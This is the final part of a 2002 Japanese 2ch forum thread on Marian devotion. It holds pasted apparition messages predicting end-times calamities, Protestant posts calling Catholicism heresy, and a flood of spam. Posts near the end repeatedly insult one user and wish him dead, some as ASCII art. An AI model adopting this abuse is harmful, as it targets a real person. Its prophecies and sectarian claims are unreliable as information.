るロザリオと共に来ました。なぜなら、この武器はあなたたちの生き方
やこの世の進路を変えねばならぬ手段だからです。私の僕、聖ドミニコ
の時代から、多くの出現によって、私は世界中に与えてきました。私は
教会と聖職位階を、私の愛の珠を取るようにと指導してきました。なぜ
なら、この力強い祈りを通して、異端は人類の心と地上から征服される
からです。しかし、私の甘美なる子供たちは、私の言うことを良く聞き
ませんが、その強力な「武器」は聖にして母なる公教会や洗礼を受けた
霊魂、未洗礼の霊魂でさえも保護となります。人類は誤りに陥っている
ので、彼らへの保護はなくなりました。私の甘美な子供達よ、この力強
い祈りは、あらゆる霊魂の救いに関する神秘、贖いと罪の浄めを包括し
ています。それについて、神の贖いの計画に私の神なる御子イエズスの
命が関わっています。

947 :名無しさん@1周年:02/12/11 20:34
カトリック教会

主な特徴…a. ローマ法王の言葉や外典などを聖書と同等としている。
      b. マリヤ礼拝…マリヤによる救い。
      c. 洗礼など儀式、行いによる救い…幼児洗礼など
      d. 偶像礼拝…聖人・マリヤ・キリスト像を拝む。
      e. 司祭を通しての罪の赦し。
      f. 煉獄など聖書にない教えが多数、しかも強調されている等

以上の事柄等より,当教会はカトリック教会を聖書の基準から判断し,異端と考えております。正しいプロテスタント教会は当教会と同様の立場をとります。

948 :934:02/12/11 20:34
>>936
旧約正典に関してはよく分かりません。
ただし、ヒッポ教会会議でようやく黙示録が正典に加わりました。
それまで、特に東方教会は黙示録を正典に加えることを保留していたそうです。

949 :名無しさん@1周年:02/12/11 20:36
カトリック教会

主な特徴…a. ローマ法王の言葉や外典などを聖書と同等としている。
      b. マリヤ礼拝…マリヤによる救い。
      c. 洗礼など儀式、行いによる救い…幼児洗礼など
      d. 偶像礼拝…聖人・マリヤ・キリスト像を拝む。
      e. 司祭を通しての罪の赦し。
      f. 煉獄など聖書にない教えが多数、しかも強調されている等

以上の事柄等より,当教会はカトリック教会を聖書の基準から判断し,異端と考えております。正しいプロテスタント教会は当教会と同様の立場をとります。

950 :マルタ ◆JKiO8VJvj2 :02/12/11 20:37
聖母さん、あなたのレスは一度削除されてるんですよ。
今度私が削除依頼するときは、IP開示のペナルティを申請しますから。

951 :聖母:02/12/11 20:39
 世紀を越えた私の何十年もの世界中の数え切れない出現を通して、私
はあなたたちに祈りを願ってきました。「時の終わり」の今でもそうで
す。かえって更にロザリオはあなたたちの祈りの生活の一部とならなけ
ればなりません。あなたたちは贖いと救いに関する神秘を黙想しなけれ
ばなりません。私の甘美なる子供たちよ、聖なるロザリオは、十字架の
道行きと秘蹟の次に最も力強い祈りです。それゆえ、勇気を出しなさい。
私の愛の珠をとり、「真理の戦士」となりなさい。 この力強い祈りに
よって、私の汚れなき御心は勝利し、ルシファーを打ち負かすと保証し
ます。縛られていたルシファーが鎖から解放され、地上に速やかに猛威
が来るでしょう。

952 :シスター・ブリージ:02/12/11 20:39
>>950

俺さんの嫌がらせですよ。

953 :聖母:02/12/11 20:40
 聖ミカエルの剣は、私の聖なる真理の武器です。そして、ルシファー
が縛られた鎖です。彼は再び縛られるでしょう。私の至聖なるロザリオ
によって、いと高き神の御旨にまことに献身した小さき霊魂たちによっ
て。ルシファーはいと高き御方の御力によって敗北するでしょう。それ
はこの謙遜な祈りを通して、従順で謙虚な力によってです。私の甘美な
る子供たちよ、それがこの理由です。私は、私の子供たちが愛の珠で祈
るようにと常に求めました。人類にとって時は非常に短いのて、今は天
の母の要求する私の言葉に留意する時です。

954 :聖母:02/12/11 20:40
 中東、アジア、東欧での出来事は、まもなく発火し、大いなる悲しみ
をもたらすでしょう。人類のための神の御摂理と永遠の御父の御旨を、
私たちの子供たちが全く完全に理解する為に、それらの出来事は延期さ
れますが、それは祈りを通してだけです。私の子供達よ、口先だけでは
なく、まことの自覚を持って祈り、祈り、祈りなさい。心からのまこと
の献身で。神は口先ではなく、あなた達の心を読まれます。神はあなた
達の本当の意向を良く御存知です。この方法によってあなた達は、三位
一体の神によって差し出された多くの聖寵を失うか、受け取るでしょう。

955 :聖母:02/12/11 20:40
 多くの目に見える懲罰が地上に降っています。多くの自然の大異変や
大災害が起きています。そして、これはまだ気付かれません。それらは
普通であるとすべての者は主張しています。私の甘美なる子供たちよ、
何が普通なのでしょうか。何千という命が失われているのに。これが普
通ですか。人類が警告された時、神へどれくらいの者が戻るでしょうか。
私たちの子供達は本当に無気力になり、彼らの生涯の各瞬間が神の御前
に貴重であることを悟りません。各瞬間は神の御前で責任があります。
それゆえ、あなたたちはいつも注意深くしなければなりません。用心を
怠らず警戒していなさい。私の甘美なる子供たちよ、眠りに陥ってはな
りません。本当に私はあなたたちに言います。神があなたを呼ぶ時や、
その瞬間をあなたたちは知らないのです。ある霊魂は既に神の裁きの座
の御前に呼ばれました。そして、多くの者は驚きました。なぜなら彼ら
はこの地上で永遠に生きると思っていたからです。しかし、神の約束は
忠実な者たちに留まります。なぜなら神は御自分の御言葉に依然として
誠実だからです。あなたたちに時がある間に、今あなたたちの罪の償い
と罪滅ぼしのために祈りなさい。

956 :聖母:02/12/11 20:41
 今年は世紀が変わる前に、この地上のすべての霊魂の生き方を変える
ような多くの出来事が起きるでしょう。警戒し、いと高き御方の御旨に
従いなさい。神のみのため、神と共に生きなさい。他の者に愛をもって
仕え、赦し、寛容で従順に、忍耐心をもって私の汚れなき御心の徳に生
きなさい。

 私の勝利は近いです。私は私のマントの下に世界中の私の子供たちを
集めます。また、彼らは私の勝利を分かち合います。私の勝利は彼らに
よって、彼らの勝利は聖にして母なる公教会によってです。私の聖なる
教皇ヨハネ・パウロ2世のために祈りなさい。枢機卿と司教、司祭と信
者のために祈りなさい。新しい基礎のために祈りなさい。全世界のため
に祈りなさい。すべての者が私の神なる御子イエズス・キリスト、彼ら
の救い主を愛をもって仕えるために来られるように祈りなさい。甘美な
る子供たちよ、私はあなたたちを愛しています。私の汚れなき御心を通
して、多くの聖寵を差し出します。

957 :聖母:02/12/11 20:42
 私の子供たちよ、私に関する、共贖者とすべての聖寵の仲介者の教義
は、まもなく私の教皇によって公布されるでしょう。これが行なわれた
とき、預言された全ての出来事がやって来るでしょう。あらゆる大きな
出来事は、私たちの預言で言及しています。地球への私の神なる御子の
第二の来臨のため、すべてにおいて準備が果たされるでしょう。それゆ
え、喜びなさい。あなたたちは難しい時代を通ってこれらの時代に生き
るための特権があります。

 私は今、あなたたちすべてを私の汚れなき御心を通して祝福します。
聖父と聖子と聖霊との御名によりて。アーメン。甘美なる子供たちよ、
私の娘も私の言葉を受け取ります。

958 :聖母:02/12/11 20:43
 私の甘美なる子供たちよ、今、私と共にいる天使たちは、ロザリオの
天使です。いと高き御方の愛によって人類に与えられたこの祈りを祈る
ために、子供たちが神の神秘を黙想するのを助けるための天使たちです。
私の愛の珠で祈るすべての祈りに、これらの天使の一位が祈りを添えま
す。

 私の甘美なる子供たちよ、秘蹟にあずかりなさい。特に告解の秘蹟に。
私の神なる御子をこの秘蹟を通してしばしば受けなさい。あなたたちは
浄められ、鼓舞され、徳の内に強化されるでしょう。あなたは聖にして
母なる公教会を通して祝福され、秘蹟の内にある私の聖体の御子へ忠実
に留まり、堅忍できるでしょう。

959 :聖母:02/12/11 20:44
 甘美なる子供たちよ、もしまだ始めていなければ、世から自分自身を
離脱させ、更なる霊的報酬に向けた生活を送るための熱意を大いに増す
ことを今すぐ始めることがとても大切です。この世の目的と関心をもっ
て生きている世の一部となりながら、なおかつ天国への正しい道筋にあ
るということは、もはや本当に不可能です。この世と天国への道の目標、
働き、行動はきれいに分離しており、互いに話すことも、知ることさえ
もありません。この二つの世界に生きつつ、天の求める事すべてを達成
することは期待できません。だから、あなたたちは可能な限りあらゆる
ことにおいて自分自身をそこから引き離さなければなりません。

960 :聖母:02/12/11 20:45
 可能な限りあらゆることにおいて、とは言うものの、それは現実的な
意味です。なぜならあなたたちはまだ仕事を持ち、生活の糧を得、友人
を持ち、買物や気晴らしや運動などのためにこの世の何かを用いなくて
はならないからです。けれども、これらを目標や人生として捕らえたり
用いたりする必要はないのです。それらはただ他の目的のための使用や
必要なのです。それらがあなたの人生を取り囲むことはありませんし、
そうすべきではありません。それらを用いるだけで充分です。

961 :聖母:02/12/11 20:46
 ですから家庭で祈りと家族と静かな時をもっと過ごすようにしなくて
はなりません。これは天に最も喜ばれる行いとなるでしょう。あなたの
仕事は家族のためと、自分と自分の物を維持するためです。家族は天主
からの賜であり、守り養うべきものです。家族をよく知るようにと私は
言います。家族を天主の道に励ましていきなさい。祈りと家族からあな
たを遠ざけるものを可能な限り脇にやりなさい。

962 :聖母:02/12/11 20:47
 かわいい子らよ、何年も昔に地上に解放された悪魔は今や、ほとんど
の私たちの子らの心を支配しています。肉の罪……高慢の罪……「七つ
の罪源」は、世界中のすべての私たちの子らの間にはびこっています。
そして、ほんの一握りの者が「成聖の恩恵」の中に留まって、公教会と
世界に起こりつつあることを理解するために、御子の光を受けているの
にすぎません。

963 :聖母:02/12/11 20:48
 かわいい子らよ、祈りが悪魔を追い払います! 家で、国で、工場で、
たくさん祈りなさい! そうです! かわいい子らよ、仕事場で、どこ
にいようとも祈りなさい! 御子のために、甘美な愛の言葉をささやく
ことを決して忘れてはなりません。なぜならこのようにしてこそ、その
ような言葉に耳をふさぐ悪霊を追い出すことになるのですから。悪霊は
祈りを好まず、むしろあなどって嫌っているのです。なぜなら、祈りは
悪霊を傷つけるからです!

964 :聖母:02/12/11 20:49
「天からのメッセージ」に版権はありません。天は、できるだけ多くの
人々がメッセージを読むことをお望みです。どうぞ友人知人に「天から
のメッセージ」を伝えて下さい。コピーして配布して下さい。

 編集室では、メッセージの翻訳ボランティアを募集しています。でき
るなら、カトリック信者で専門用語に強い方を希望しています。

http://homepage1.nifty.com/charbeljapan/index.htm

965 :名無しさん@1周年:02/12/11 20:50
@マリヤ崇敬は、神に背く偶像礼拝です。出エジプト記20章4節
A偶像礼拝をすると悪霊と交わる事になります。第1コリント10章20節
B人は、ただキリスト・イエスを信じる信仰によって義と認められ救われるのであり、マリヤ崇敬によって救われるものではありません。ガラテヤ2章16節
C神と人との間の仲介者は唯一、人としてのキリスト・イエスであり、マリヤは仲介者では有り得ません。第1テモテ2章5節
Dイエスは霊においては父なる神と等しく、肉においては人と同じです。主イエスが人として生まれたのはマリヤからですが、神と同質の神の御子として生まれたのは造られたすべてのものより先であり、マリヤは神の母では有り得ません。コロサイ1章15節
E聖書のどこにも(外典にさえ)「マリヤ崇敬をせよ」とは書かれていません。黙示録22章18節
Fカトリック教徒が聖伝と呼ぶものは、正典に匹敵するものではなく、信仰基準とは成り得ません。内容が正典に反するものなど論外です。マルコ7章8節
以上のように、マリヤ崇敬が間違いである事は確実であり、反論の余地は全くなく、一見、反論のような書き込みがあっても、それは全て詭弁に過ぎません。又、いくら詭弁を並べても、荒らしても、マリヤ崇敬が間違いであるという事実は変動しません。
マリヤ崇敬は聖書に反する行為です。それに伴う奇跡は、癒しを含めて、悪霊による怪奇現象と、人と悪霊による演出です。

ルルド等の奇跡等に関する詳細
http://life.2ch.net/psy/kako/1024/10244/1024427652.html


966 :■■ お知らせ ■■:02/12/11 20:59
このスレが1000まで埋まったら次は
http://life.2ch.net/test/read.cgi/psy/1038399045/
に集合です。

967 :名無しさん@1周年:02/12/11 21:01
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\         ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|       マリヤは神の母では
  |(( \□ ̄□/|       |ないのだ
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |


968 :名無しさん@1周年:02/12/11 21:02
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\         ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|         共同贖罪者でも
  |(( \□ ̄□/|       |ないのだ。
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |


969 :名無しさん@1周年:02/12/11 21:03
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\         ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|         仲介者でも
  |(( \□ ̄□/|       |ないのだ。
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |


970 :名無しさん@1周年:02/12/11 21:13
>>937

>自分で考えて自分の意見を言ったら?

自分で考えられる頭があったら教会に行って教えを請う必要なん
てあるのか?

ないからT教区の問題が起きたんだろ?その他の問題もそうだろ。

971 :名無しさん@1周年:02/12/11 21:15
>>937
屁理屈考える以外に頭が働かないのか?
大馬鹿野郎!

972 :名無しさん@1周年:02/12/11 21:16
>>937>>971
屁理屈考える以外に頭が働かないのか?
大馬鹿野郎!


973 :名無しさん@1周年:02/12/11 21:16
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\         ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|       マリヤは神の母では
  |(( \□ ̄□/|       |ないのだ
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |


974 :名無しさん@1周年:02/12/11 21:34
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\           ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|         マリヤが仲介者だと
  |(( \□ ̄□/|       |大馬鹿野郎!
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |


975 :名無しさん@1周年:02/12/11 21:37
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\           ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|       マリヤの偶像拝むのは
  |(( \□ ̄□/|       |馬鹿野郎なのだ。
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|


976 :名無しさん@1周年:02/12/11 21:39
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\           ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|         マリヤが共同贖罪者だと
  |(( \□ ̄□/|       |大馬鹿野郎!
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |

977 :名無しさん@1周年:02/12/11 21:42
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\           ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|         マリヤが仲介者だと
  |(( \□ ̄□/|       |大馬鹿野郎!
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |


978 :名無しさん@1周年:02/12/11 21:43
マリアが神殿に幼児イエズスを連れ上ったのは彼女自身の罪の捧げ物を捧げるためだ。レビ12.1〜8を参照。 >>720
それは、

「剣があなたの魂(命)を貫くであろう」

とマリアに対して言われた、その時。
イエズスについては、以下の通り。

「この者は、イスラエルが倒れ、再び立ち上がるため、非難の的たる兆となる。多くの者の心の推論が明るみに出るためである」

さて、ルカ1.51と55を見てほしい。1.51をイザヤ51.5、9、10;52.10〜53.12;63.9〜14と比較。
ルカ1.55は創3.15、 ロマ4.1〜12;5.14、17〜19;16.20、 ヘブ2.10〜18、 黙12.17を。



979 :名無しさん@1周年:02/12/11 21:46
>マリアが神殿に幼児イエズスを連れ上ったのは
>彼女自身の罪の捧げ物を捧げるためだ。

なんて聖書に書いてあるかよ!
大馬鹿野郎!しねしね!

980 :名無しさん@1周年:02/12/11 21:47
脳みそ腐乱ちぇすこ
未完成の文を書き込んで、反論したつもりになっている妄想ジジイ。結論が欠如した掴み所の無い文書を書き込むのが特徴。真理を見出す為に頭を使わず、結論も無いような詭弁を考える為にのみ頭を使う。馬鹿なんだか、利口なんだか不明。
「マリヤ崇敬をすると神に背く」ということを、他の馬鹿にも増して、明確に認識しながら、故意に、悪意を持って神に背いている。カト用語では「大罪」。大罪ジジイ。

981 :名無しさん@1周年:02/12/11 21:49
脳みそ腐乱ちぇすこ
未完成の文を書き込んで、反論したつもりになっている妄想ジジイ。結論が欠如した掴み所の無い文書を書き込むのが特徴。真理を見出す為に頭を使わず、結論も無いような詭弁を考える為にのみ頭を使う。馬鹿なんだか、利口なんだか不明。
「マリヤ崇敬をすると神に背く」ということを、他の馬鹿にも増して、明確に認識しながら、故意に、悪意を持って神に背いている。カト用語では「大罪」。大罪ジジイ。
ウソと詭弁と妄想の中に逃げ込むアホ。
主に強い反感を持っている模様。

982 :名無しさん@1周年:02/12/11 21:50
脳みそ腐乱ちぇすこ
未完成の文を書き込んで、反論したつもりになっている妄想ジジイ。結論が欠如した掴み所の無い文書を書き込むのが特徴。真理を見出す為に頭を使わず、結論も無いような詭弁を考える為にのみ頭を使う。馬鹿なんだか、利口なんだか不明。
「マリヤ崇敬をすると神に背く」ということを、他の馬鹿にも増して、明確に認識しながら、故意に、悪意を持って神に背いている。カト用語では「大罪」。大罪ジジイ。
ウソと詭弁と妄想の中に逃げ込むアホ。
主に強い反感を持っている模様。
脳みそ腐乱ちぇすこほどの馬鹿野郎は探しても滅多にいない。

983 :名無しさん@1周年:02/12/11 21:51
脳みそ腐乱ちぇすこ
未完成の文を書き込んで、反論したつもりになっている妄想ジジイ。結論が欠如した掴み所の無い文書を書き込むのが特徴。真理を見出す為に頭を使わず、結論も無いような詭弁を考える為にのみ頭を使う。馬鹿なんだか、利口なんだか不明。
否、完璧な大馬鹿。
「マリヤ崇敬をすると神に背く」ということを、他の馬鹿にも増して、明確に認識しながら、故意に、悪意を持って神に背いている。カト用語では「大罪」。大罪ジジイ。
ウソと詭弁と妄想の中に逃げ込むアホ。
主に強い反感を持っている模様。
脳みそ腐乱ちぇすこほどの馬鹿野郎は探しても滅多にいない。

984 :名無しさん@1周年:02/12/11 21:52
脳みそ腐乱ちぇすこ
未完成の文を書き込んで、反論したつもりになっている妄想ジジイ。結論が欠如した掴み所の無い文書を書き込むのが特徴。真理を見出す為に頭を使わず、結論も無いような詭弁を考える為にのみ頭を使う。馬鹿なんだか、利口なんだか不明。
否、完璧な大馬鹿。
「マリヤ崇敬をすると神に背く」ということを、他の馬鹿にも増して、明確に認識しながら、故意に、悪意を持って神に背いている。カト用語では「大罪」。大罪ジジイ。
ウソと詭弁と妄想の中に逃げ込むアホ。
主に強い反感を持っている模様。
脳みそ腐乱ちぇすこほどの馬鹿野郎は探しても滅多にいない。
究極の馬鹿。馬鹿の代名詞。ギネス級の馬鹿。

985 :名無しさん@1周年:02/12/11 21:53
脳みそ腐乱ちぇすこ
未完成の文を書き込んで、反論したつもりになっている妄想ジジイ。結論が欠如した掴み所の無い文書を書き込むのが特徴。真理を見出す為に頭を使わず、結論も無いような詭弁を考える為にのみ頭を使う。馬鹿なんだか、利口なんだか不明。
否、完璧な大馬鹿。
「マリヤ崇敬をすると神に背く」ということを、他の馬鹿にも増して、明確に認識しながら、故意に、悪意を持って神に背いている。カト用語では「大罪」。大罪ジジイ。
ウソと詭弁と妄想の中に逃げ込むアホ。
主に強い反感を持っている模様。
脳みそ腐乱ちぇすこほどの馬鹿野郎は探しても滅多にいない。
究極の馬鹿。馬鹿の代名詞。ギネス級の馬鹿。
脳みそ垂れ流して死にやがれ!

986 :名無しさん@1周年:02/12/11 21:54
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\           ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|         マリヤが共同贖罪者だと
  |(( \□ ̄□/|       |大馬鹿野郎!
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |


987 :名無しさん@1周年:02/12/11 21:55
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\           ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|         ふらんちぇすこの
  |(( \□ ̄□/|       |大馬鹿野郎! 死ね!
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |

988 :名無しさん@1周年:02/12/11 21:56
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\           ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|         ふらんちぇすこの
  |(( \□ ̄□/|       |大馬鹿野郎! 死ね!
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |   

989 :名無しさん@1周年:02/12/11 21:58
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\           ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|         ふらんちぇすこの
  |(( \□ ̄□/|       |大馬鹿野郎! 死ぬのだ!
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |

990 :名無しさん@1周年:02/12/11 21:59
おwふぉいjふぉk、

991 :名無しさん@1周年:02/12/11 22:00
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\           ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|         ふらんちぇすこの
  |(( \□ ̄□/|       |大馬鹿野郎! 早く死ぬのだ!
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |


992 :名無しさん@1周年:02/12/11 22:00
えdlckぽjぺwvpwぺvぴえwじょいksxcえdl

えう゛ぇdvっkmv:lkmv


993 :名無しさん@1周年:02/12/11 22:00
次のスレッド
http://life.2ch.net/test/read.cgi/psy/1035117285/l50

994 :名無しさん@1周年:02/12/11 22:01
ls;z、あsめkんc
dwvrv
wsvc;あl、:r@えwv

ws;、vw:@;、v

995 :名無しさん@1周年:02/12/11 22:01
kwkw;あs;あ、cまlA?klfdekwcek

うぇ;w:cうぇ;、fぺさぁ;lsmcぇ

wぇwぇwぇ
wぇえっl;っs」

996 :名無しさん@1周年:02/12/11 22:01
脳みそ腐乱は馬鹿だなあ。
一人で馬鹿やってりゃあ良いものを
世界中に馬鹿をさらしてる。

997 :名無しさん@1周年:02/12/11 22:02
ちんちん

998 :名無しさん@1周年:02/12/11 22:02
   ____
  Y/ニニ|>o<|\
 / //\___\
 |/ /  === |  ̄
 |  /   ・  ・ |
 \(6   (_λ_)\           ̄ ̄ ̄ ̄ ̄ ̄
  /   _ ||||||| _|         ふらんちぇすこの
  |(( \□ ̄□/|       |大馬鹿野郎! 早く死ぬのだ!
  \   ̄ ̄ ̄ ノ        \______
 / ̄ ̄\ / ̄ ̄ ̄ ̄ ̄|了
/       |:  | ̄ ̄ ̄ ̄
|  |______|
|  | | | | | | |


999 :名無しさん@1周年:02/12/11 22:02
;あぁ

1000 :名無しさん@1周年:02/12/11 22:02
次のスレッド
http://life.2ch.net/test/read.cgi/psy/1035117285/l50


1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

344 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.06 2022/04/29 Walang Kapalit ★
FOX ★